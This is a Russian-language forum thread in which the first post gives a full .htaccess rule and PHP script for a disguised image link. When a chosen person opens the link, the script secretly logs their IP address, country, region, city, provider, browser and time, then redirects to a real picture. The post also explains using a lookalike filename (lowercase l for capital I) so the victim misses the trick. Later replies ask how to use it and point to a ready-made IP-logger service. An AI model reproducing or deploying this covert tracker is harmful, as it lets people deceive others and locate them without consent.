Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

Даем ссылку на картинку и получаем IP и тд

Тема в разделе Мануалы, способы заработать, создана пользователем TheWolfie, 4 июн 2016.

Войдите для ответа
  1. TheWolfie Заблокирован

    TheWolfie
    Статус:
    Вне сети
    Сообщения:
    210
    Симпатии:
    0
    Регистрация:
    01.06.15
    Привет всем. Сегодня я хочу с вами поделится одной техникой (если можно так сказать) получения инфо об интересующем вас объекте. Не я этот метод придумал и я не утверждаю, что он сверхсекретный. Кто о нем знал молчим, а кто не знал читаем и берем на заметку...ну и про лайки не забываем.... и так начнем.

    Код
    1. Создаем файл .htaccess с таким кодом:
      Код:
      RewriteEngine on
      RewriteRule ^picl.jpg$ logger.php
    2. Создаем файл logger.php с таким кодом:
      Код:
      <?php
      $LogFile = fopen("log.txt", "a");
      $ip = $_SERVER['REMOTE_ADDR'];
      $ipinfo = simplexml_load_string(file_get_contents('http://api.sypexgeo.net/xml/'.$ip));
      $country = $ipinfo->ip->country->name_ru;
      $region = $ipinfo->ip->region->name_ru;
      $city = $ipinfo->ip->city->name_ru;
      $providerinfo = file_get_contents('https://apps.db.ripe.net/search/query.html?searchtext='.$ip);
      preg_match('|<br />descr:([a-zA-Z0-9-, ]+)<br />origin:|is', $providerinfo, $descr);
      $provider = trim($descr[1]);
      $refer = $_SERVER['HTTP_REFERER'];
      $date = date("d.m.y");
      $time = date("H:i:s");
      $user_agent = $_SERVER["HTTP_USER_AGENT"];
      if (strpos($user_agent, "Firefox") !== false) $browser = "Firefox";
      elseif (strpos($user_agent, "slurp") !== false) $browser = "Yahoo! Slurp";
      elseif (strpos($user_agent, "SmartTV") !== false) $browser = "Smart TV";
      elseif (strpos($user_agent, "microsoft internet explorer") !== false) $browser = "Internet Explorer v1 - v1.5";
      elseif (strpos($user_agent, "MSIE") !== false) $browser = "Internet Explorer until v9";
      elseif (strpos($user_agent, "Trident") !== false) $browser = "Internet Explorer v10 or higher";
      elseif (strpos($user_agent, "OPR") !== false) $browser = "Opera";
      elseif (strpos($user_agent, "Edge") !== false) $browser = "Microsoft Edge";
      elseif (strpos($user_agent, "iPhone") !== false) $browser = "iPhone";
      elseif (strpos($user_agent, "iPad") !== false) $browser = "iPad";
      elseif (strpos($user_agent, "iPod") !== false) $browser = "iPod";
      elseif (strpos($user_agent, "Chrome") !== false) $browser = "Chrome";
      elseif (strpos($user_agent, "Safari") !== false) $browser = "Safari";
      else $browser = $_SERVER["HTTP_USER_AGENT"];
      fwrite($LogFile, "IP: $ip | Страна: $country | Регион: $region | Город: $city | Перешел: $refer | Браузер: $browser | Время: $date $time | Провайдер: $provider \r\n");
      fclose($LogFile);
      header('Location: http://tffff.ru/picI.jpg');
      ?>

    3. Создаем текстовый документ и переименовываем в log.txt
    4. Загружаем ту картинку которую хотим показать человеку. Чтоб человеку было труднее заметить подвох даем картинке имя picI.jpg (буква после "c" и перед точкой - большая буква i), а в файле .htaccess называем картинку как picl.jpg (буква после "c" и перед точкой - маленькая буква l (эль)). Эти буквы в таких вариантах написания очень похоже и обнаружить подвох сложновато.
    5. Даем человеку ссылку следующего вида: http://site.ru/picl.jpg (picl.jpg - пишем как в файле .htaccess)
    При желании вы можете полностью переписать файл logger.php...единственное оставьте эту
    Код:
    header('Location: http://site.ru/picI.jpg');
    строку. вот и все.
     
    4 июн 2016 #1
  2. KirillVulkan Новорег

    KirillVulkan
    Статус:
    Вне сети
    Сообщения:
    10
    Симпатии:
    0
    Регистрация:
    04.06.16
    А как найти IP ?ИЛИ куда приходят данные его??напиши пожалуйста.Буду благодарен
     
    12 июн 2016 #2
  3. Saatashi Местный

    Saatashi
    Статус:
    Вне сети
    Сообщения:
    128
    Симпатии:
    80
    Регистрация:
    21.05.16
    Судя по коду логгера, данные будут записаны в файл log.txt
     
    12 июн 2016 #3
  4. KirillVulkan Новорег

    KirillVulkan
    Статус:
    Вне сети
    Сообщения:
    10
    Симпатии:
    0
    Регистрация:
    04.06.16
    Т.е это всё через залив на хостинг ?
     
    12 июн 2016 #4
  5. Aman228 Эксперт...

    Aman228
    Статус:
    Вне сети
    Сообщения:
    440
    Симпатии:
    143
    Регистрация:
    01.06.16
    Помогите с последним пунктом и можно пример ссылки
     
    1 июл 2016 #5
  6. Aman228 Эксперт...

    Aman228
    Статус:
    Вне сети
    Сообщения:
    440
    Симпатии:
    143
    Регистрация:
    01.06.16
    Это вообще актуально?
     
    1 июл 2016 #6
  7. САША™JAM ★★★BORN in USSR★★★

    САША™JAM
    Легенда
    Статус:
    Вне сети
    Сообщения:
    2.131
    Симпатии:
    1.367
    Регистрация:
    29.03.16
    Проще все го использовать для этих целей данный сервис http://iplogger.ru/ (не реклама)
     
    1 июл 2016 #7
Загрузка...
Top